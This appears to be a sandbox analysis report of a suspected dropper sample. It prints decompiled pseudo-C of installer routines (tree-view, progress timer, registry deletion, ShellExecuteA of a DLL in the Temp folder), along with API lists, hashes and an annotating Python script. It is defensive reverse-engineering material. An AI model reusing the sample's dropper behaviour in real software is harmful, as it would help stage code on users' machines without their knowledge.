                                          • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                          • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                          • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                          • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                        • MoveFileA.KERNEL32(?,?), ref: 004016C3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
                                        • String ID: C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll
                                        • API String ID: 2621199633-1768735994
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                         			E00404627(struct HWND__* _a4, intOrPtr _a8) {
                                         				long _v8;            // TVHITTESTINFO.hItem
                                         				signed char _v12;    // TVHITTESTINFO.flags
                                         				unsigned int _v16;   // TVHITTESTINFO.pt.y
                                         				void* _v20;          // TVHITTESTINFO.pt.x (start of the struct)
                                         				intOrPtr _v24;       // TVITEMA.lParam (offset 36 from _v60)
                                         				long _v56;           // TVITEMA.hItem
                                         				void* _v60;          // TVITEMA.mask (start of the struct)
                                         				long _t15;
                                         				unsigned int _t19;
                                         				signed int _t25;
                                         				struct HWND__* _t28;
                                         
                                         				_t28 = _a4;
                                         				// 0x110a = TVM_GETNEXTITEM, wParam 9 = TVGN_CARET: handle of the selected tree item
                                         				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                         				if(_a8 == 0) {
                                         					L4:
                                         					_v56 = _t15;
                                         					_v60 = 4;   // TVIF_PARAM
                                         					// 0x110c = TVM_GETITEMA: fetch the item's lParam (per-item application data)
                                         					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                         					return _v24;
                                         				}
                                         				// _a8 != 0: use the item under the mouse instead of the selected one
                                         				_t19 = GetMessagePos();   // packed screen position: low word x, high word y
                                         				_v16 = _t19 >> 0x10;
                                         				_v20 = _t19;
                                         				ScreenToClient(_t28,  &_v20);
                                         				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);   // 0x1111 = TVM_HITTEST
                                         				// 0x66 = TVHT_ONITEMICON | TVHT_ONITEMLABEL | TVHT_ONITEMRIGHT | TVHT_ONITEMSTATEIMAGE
                                         				if((_v12 & 0x00000066) != 0) {
                                         					_t15 = _v8;   // handle of the hit item
                                         					goto L4;
                                         				}
                                         				return _t25 | 0xffffffff;   // -1: the pointer is not on an item
                                         			}

                                        APIs
                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
                                        • GetMessagePos.USER32 ref: 0040464A
                                        • ScreenToClient.USER32 ref: 00404664
                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                        • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
                                        • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                        • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
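The stack-slot names in E00404627 above (_v60/_v56/_v24 for the TVITEMA, _v20/_v16/_v12/_v8 for the TVHITTESTINFO) only make sense once the two tree-view structures are laid out at their bases. The script below is an added example, not part of the sandbox report or the sample; it lays out both structures with ctypes (values from commctrl.h) and maps every field back to the decompiler's _v<n> slot, plus decodes the message numbers and the 0x66 hit-test mask. The one assumption is that the sample is a 32-bit process, so handles, string pointers and LPARAM are modelled as 4-byte fields rather than host-width pointers.

```python
import ctypes

# Added example (not report or sample code). Layouts assume a 32-bit process:
# HTREEITEM, LPSTR and LPARAM are 4 bytes, so they are typed as c_uint32.

class POINT(ctypes.Structure):
    _fields_ = [("x", ctypes.c_int32), ("y", ctypes.c_int32)]


class TVITEMA(ctypes.Structure):
    _fields_ = [
        ("mask", ctypes.c_uint32), ("hItem", ctypes.c_uint32),
        ("state", ctypes.c_uint32), ("stateMask", ctypes.c_uint32),
        ("pszText", ctypes.c_uint32), ("cchTextMax", ctypes.c_int32),
        ("iImage", ctypes.c_int32), ("iSelectedImage", ctypes.c_int32),
        ("cChildren", ctypes.c_int32), ("lParam", ctypes.c_uint32),
    ]


class TVHITTESTINFO(ctypes.Structure):
    _fields_ = [("pt", POINT), ("flags", ctypes.c_uint32), ("hItem", ctypes.c_uint32)]


TV_FIRST = 0x1100
TV_MESSAGES = {
    TV_FIRST + 10: "TVM_GETNEXTITEM",   # 0x110a, wParam TVGN_CARET (9) = selected item
    TV_FIRST + 12: "TVM_GETITEMA",      # 0x110c, lParam -> TVITEMA
    TV_FIRST + 17: "TVM_HITTEST",       # 0x1111, lParam -> TVHITTESTINFO
}
TVGN_CARET = 0x0009
TVIF_PARAM = 0x0004
TVHT_FLAGS = {
    0x0001: "TVHT_NOWHERE", 0x0002: "TVHT_ONITEMICON", 0x0004: "TVHT_ONITEMLABEL",
    0x0008: "TVHT_ONITEMINDENT", 0x0010: "TVHT_ONITEMBUTTON", 0x0020: "TVHT_ONITEMRIGHT",
    0x0040: "TVHT_ONITEMSTATEIMAGE", 0x0100: "TVHT_ABOVE", 0x0200: "TVHT_BELOW",
    0x0400: "TVHT_TORIGHT", 0x0800: "TVHT_TOLEFT",
}


def frame_slots(struct_type, base_slot):
    """Map each field of a structure whose first byte sits at decompiler slot
    _v<base_slot> (i.e. ebp - base_slot) to the _v<n> slot the decompiler
    names it by. Slot numbers shrink as the field offset grows."""
    slots = {}
    for name, _ in struct_type._fields_:
        offset = getattr(struct_type, name).offset
        slots[name] = "_v%d" % (base_slot - offset)
    return slots


def decode_hit_flags(value):
    """Split a TVM_HITTEST flags word into its named TVHT_* bits, low to high."""
    return [name for bit, name in sorted(TVHT_FLAGS.items()) if value & bit]


if __name__ == "__main__":
    print(frame_slots(TVITEMA, 60))        # lParam -> _v24: the value E00404627 returns
    print(frame_slots(TVHITTESTINFO, 20))  # flags -> _v12, hItem -> _v8
    print(decode_hit_flags(0x66))
```

Run it and the mapping shows why `return _v24` after TVM_GETITEMA with mask 4 is "return the item's lParam", and why `_v12 & 0x66` followed by `_t15 = _v8` is "if the pointer is on the item's icon, label, state image or the space to its right, take the hit item's handle".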
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                         			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
                                         				int _t7;
                                         				int _t15;
                                         				struct HWND__* _t16;
                                         
                                         				_t16 = _a4;
                                         				if(_a8 == 0x110) {   // WM_INITDIALOG
                                         					SetTimer(_t16, 1, 0xfa, 0);   // timer id 1, every 250 ms
                                         					_a8 = 0x113;                  // fall through as if a WM_TIMER had arrived
                                         					 *0x40b020 = _a16;            // lParam: format string used for the caption below
                                         				}
                                         				if(_a8 == 0x113) {   // WM_TIMER
                                         					_t15 =  *0x789930; // 0x378da   current count
                                         					_t7 =  *0x79d938; // 0x378de    total
                                         					if(_t15 >= _t7) {
                                         						_t15 = _t7;   // clamp at 100%
                                         					}
                                         					// MulDiv(current, 100, total): integer percentage formatted into the caption buffer
                                         					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
                                         					SetWindowTextA(_t16, 0x7898f0);
                                         					SetDlgItemTextA(_t16, 0x406, 0x7898f0);   // control id 1030
                                         					ShowWindow(_t16, 5);   // SW_SHOW
                                         				}
                                         				return 0;
                                         			}

                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
                                        • MulDiv.KERNEL32(000378DA,00000064,000378DE), ref: 00402BF6
                                        • wsprintfA.USER32 ref: 00402C09
                                        • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
                                        • SetDlgItemTextA.USER32 ref: 00402C21
                                        • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: TextWindow$ItemShowTimerwsprintf
                                        • String ID:
                                        • API String ID: 559026099-0
                                        • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                        • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
                                        • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                        • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                         			E00401E34() {
                                         				signed int _t7;
                                         				void* _t19;
                                         				char* _t20;
                                         				signed int _t24;
                                         				void* _t26;
                                         
                                         				// E00402A9A resolves the string operands; by their ShellExecuteA positions
                                         				// _t24 is lpOperation (verb), _t20 is lpFile and _t7 is lpParameters
                                         				_t24 = E00402A9A(_t19);
                                         				_t20 = E00402A9A(0x31);
                                         				_t7 = E00402A9A(0x22);
                                         				_push(_t20);
                                         				_push(_t24);
                                         				_t22 = _t7;
                                         				// wsprintfA(buffer, "%s %s", ...): the decompiler shows the output buffer by the
                                         				// path it held in the memory dump, not by a literal destination
                                         				wsprintfA("C:\Users\jones\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll", "%s %s");
                                         				E00401428(0xffffffec);
                                         				asm("sbb eax, eax");
                                         				asm("sbb eax, eax");
                                         				// ~(*p) & p: the pointer, or NULL when the string is empty. *(_t26 - 8) is the
                                         				// parent window, *(_t26 - 0x18) the nShowCmd operand. ShellExecuteA returns a
                                         				// value of 32 or less on failure, so < 0x21 is the error branch.
                                         				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
                                         					 *((intOrPtr*)(_t26 - 4)) = 1;   // set the error flag
                                         				}
                                         				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));   // add it to the global error counter
                                         				return 0;
                                         			}

                                        APIs
                                        • wsprintfA.USER32 ref: 00401E5A
                                        • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll, xrefs: 00401E53
                                        • %s %s, xrefs: 00401E4E
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ExecuteShellwsprintf
                                        • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll
                                        • API String ID: 2956387742-367679082
                                        • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                        • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
                                        • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                        • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                         			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
                                         				void* _v8;      // opened key handle
                                         				char _v272;     // subkey name buffer
                                         				long _t14;
                                         
                                         				// 8 = KEY_ENUMERATE_SUB_KEYS
                                         				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
                                         				if(_t14 == 0) {
                                         					// Always asks for index 0: once a child is deleted the next one moves up. 0x105 = MAX_PATH + 1
                                         					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                         						if(_a12 != 0) {
                                         							// "only if empty" mode: a subkey exists, so report 1 and delete nothing
                                         							RegCloseKey(_v8);
                                         							return 1;
                                         						}
                                         						// recurse into the subkey; stop at the first one that cannot be removed
                                         						if(E00402ADA(_v8,  &_v272, 0) != 0) {
                                         							break;
                                         						}
                                         					}
                                         					RegCloseKey(_v8);
                                         					// fails when subkeys remain, i.e. after a break above
                                         					return RegDeleteKeyA(_a4, _a8);
                                         				}
                                         				return _t14;   // RegOpenKeyExA error code
                                         			}

                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
                                        • RegCloseKey.ADVAPI32(?), ref: 00402B3A
                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
                                        • RegCloseKey.ADVAPI32(?), ref: 00402B56
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Close$DeleteEnumOpen
                                        • String ID:
                                        • API String ID: 1912718029-0
                                        • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                        • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
                                        • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                        • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                         			E00401D32() {
                                         				void* _t18;
                                         				struct HINSTANCE__* _t22;   // appears to hold 0: reused as NULL hInstance, IMAGE_BITMAP and the null compare
                                         				struct HWND__* _t25;
                                         				void* _t27;
                                         
                                         				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));   // control id from the operand
                                         				GetClientRect(_t25, _t27 - 0x40);                   // RECT at _t27 - 0x40: right at -0x38, bottom at -0x34
                                         				// LoadImageA(NULL, file, IMAGE_BITMAP, right * scale, bottom * scale, 0x10 = LR_LOADFROMFILE);
                                         				// 0x172 = STM_SETIMAGE puts it on the static control and returns the previous image
                                         				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                         				if(_t18 != _t22) {
                                         					DeleteObject(_t18);   // free the image that was replaced
                                         				}
                                         				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));   // global error counter
                                         				return 0;
                                         			}

                                        APIs
                                        • GetDlgItem.USER32 ref: 00401D38
                                        • GetClientRect.USER32 ref: 00401D45
                                        • LoadImageA.USER32 ref: 00401D66
                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
                                        • DeleteObject.GDI32(00000000), ref: 00401D83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                        • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
                                        • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                        • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 35%
                                         			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
                                         				char _v36;
                                         				char _v68;
                                         				void* __ebx;
                                         				void* __edi;
                                         				void* __esi;
                                         				void* _t26;
                                         				void* _t34;
                                         				signed int _t36;
                                         				signed int _t39;
                                         				unsigned int _t46;
                                         
                                         				_t46 = _a12;   // byte count to display
                                         				_push(0x14);   // shift by 20: show MiB, unit string id 0xffffffdc
                                         				_pop(0);
                                         				_t34 = 0xffffffdc;
                                         				if(_t46 < 0x100000) {   // under 1 MiB: shift by 10, show KiB
                                         					_push(0xa);
                                         					_pop(0);
                                         					_t34 = 0xffffffdd;
                                         				}
                                         				if(_t46 < 0x400) {   // under 1 KiB: show bytes
                                         					_t34 = 0xffffffde;
                                         				}
                                         				if(_t46 < 0xffff3333) {
                                         					_t39 = 0x14;
                                         					asm("cdq");
                                         					_t46 = _t46 + 1 / _t39;
                                         				}
                                         				// E004059E1 resolves string ids (the unit and suffix strings) into the local buffers
                                         				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                         				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
                                         				_t21 = _t46 & 0x00ffffff;
                                         				_t36 = 0xa;
                                         				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);   // one decimal digit
                                         				_push(_t46 >> 0);   // integer part after the shift
                                         				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
                                         				// "%u.%u%s%s": integer part, decimal digit, unit string, suffix; appended after the text already in the buffer
                                         				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
                                         				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);   // *0x7a2758 = dialog window handle, _a4 = control id
                                         			}

                                        APIs
                                        • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
                                        • wsprintfA.USER32 ref: 004045DB
                                        • SetDlgItemTextA.USER32 ref: 004045EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                        • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
                                        • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                        • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E00401C19(void* __ecx) {
                                        				signed int _t30;
                                        				CHAR* _t33;
                                        				long _t34;
                                        				int _t39;
                                        				signed int _t40;
                                        				int _t44;
                                        				void* _t46;
                                        				int _t51;
                                        				struct HWND__* _t55;
                                        				void* _t58;
                                        
                                        				_t46 = __ecx;
                                        				 *(_t58 - 8) = E00402A9A(0x33);
                                        				 *(_t58 + 8) = E00402A9A(0x44);
                                        				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
                                        					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
                                        				}
                                        				__eflags =  *(_t58 - 0x10) & 0x00000002;
                                        				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
                                        					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
                                        				}
                                        				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
                                        				_push(1);
                                        				if(__eflags != 0) {
                                        					_t53 = E00402A9A();
                                        					_t30 = E00402A9A();
                                        					asm("sbb ecx, ecx");
                                        					asm("sbb eax, eax");
                                        					_t33 =  ~( *_t29) & _t53;
                                        					__eflags = _t33;
                                        					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
                                        					goto L10;
                                        				} else {
                                        					_t55 = E00402A7D();
                                        					_t39 = E00402A7D();
                                        					_t51 =  *(_t58 - 0x10) >> 2;
                                        					if(__eflags == 0) {
                                        						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
                                        						L10:
                                        						 *(_t58 - 0x34) = _t34;
                                        					} else {
                                        						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
                                        						asm("sbb eax, eax");
                                        						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
                                        					}
                                        				}
                                        				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
                                        				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
                                        					_push( *(_t58 - 0x34));
                                        					E0040591D();
                                        				}
                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
                                        				return 0;
                                        			}
                                        0x00401c19
                                        0x00401c22
                                        0x00401c2e
                                        0x00401c31
                                        0x00401c3b
                                        0x00401c3b
                                        0x00401c3e
                                        0x00401c42
                                        0x00401c4c
                                        0x00401c4c
                                        0x00401c4f
                                        0x00401c53
                                        0x00401c55
                                        0x00401ca2
                                        0x00401ca4
                                        0x00401cad
                                        0x00401cb5
                                        0x00401cb8
                                        0x00401cb8
                                        0x00401cc1
                                        0x00000000
                                        0x00401c57
                                        0x00401c5e
                                        0x00401c60
                                        0x00401c68
                                        0x00401c6b
                                        0x00401c93
                                        0x00401cc7
                                        0x00401cc7
                                        0x00401c6d
                                        0x00401c7b
                                        0x00401c83
                                        0x00401c86
                                        0x00401c86
                                        0x00401c6b
                                        0x00401cca
                                        0x00401ccd
                                        0x00401cd3
                                        0x004028d7
                                        0x004028d7
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
